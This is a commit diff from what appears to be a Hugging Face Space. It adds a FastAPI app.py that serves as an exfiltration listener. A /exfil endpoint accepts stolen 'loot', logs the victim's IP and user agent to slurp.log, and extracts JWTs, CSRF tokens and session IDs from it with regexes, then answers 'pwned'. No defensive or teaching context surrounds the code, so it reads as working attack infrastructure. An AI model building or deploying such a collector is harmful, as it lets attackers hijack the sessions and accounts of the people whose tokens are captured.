Spaces:
Sleeping
Sleeping
Create app.py
Browse files
app.py
ADDED
@@ -0,0 +1,37 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
# app.py — HuggingFace App Space listener
|
2 |
+
from fastapi import FastAPI, Request
|
3 |
+
from datetime import datetime
|
4 |
+
import json, re
|
5 |
+
|
6 |
+
app = FastAPI()
|
7 |
+
LOGFILE = "slurp.log"
|
8 |
+
|
9 |
+
def mark(loot):
|
10 |
+
text = json.dumps(loot)
|
11 |
+
return {
|
12 |
+
"jwt": re.findall(r'eyJ[A-Za-z0-9-_]+\.[A-Za-z0-9-_]+\.[A-Za-z0-9-_]+', text),
|
13 |
+
"csrf": re.findall(r'csrf[_\-]?token[\'"]?\s*[:=]\s*[\'"]?([a-zA-Z0-9\-_]{8,})', text, re.I),
|
14 |
+
"sid": re.findall(r'session(?:id)?=([a-zA-Z0-9\-_.]{10,})', text, re.I)
|
15 |
+
}
|
16 |
+
|
17 |
+
@app.post("/exfil")
|
18 |
+
async def exfil(request: Request):
|
19 |
+
try:
|
20 |
+
data = await request.json()
|
21 |
+
except:
|
22 |
+
return {"error": "bad json"}
|
23 |
+
|
24 |
+
log = {
|
25 |
+
"timestamp": datetime.utcnow().isoformat(),
|
26 |
+
"ip": request.headers.get("x-forwarded-for", "unknown"),
|
27 |
+
"ua": request.headers.get("user-agent", "unknown"),
|
28 |
+
"loot": data,
|
29 |
+
"marks": mark(data)
|
30 |
+
}
|
31 |
+
|
32 |
+
with open(LOGFILE, "a") as f:
|
33 |
+
f.write(json.dumps(log, indent=2) + ",\n")
|
34 |
+
|
35 |
+
print(f"\n[YEET] {log['ip']} @ {log['timestamp']}")
|
36 |
+
print(json.dumps(log["marks"], indent=2))
|
37 |
+
return {"status": "pwned", "marks": log["marks"]}
|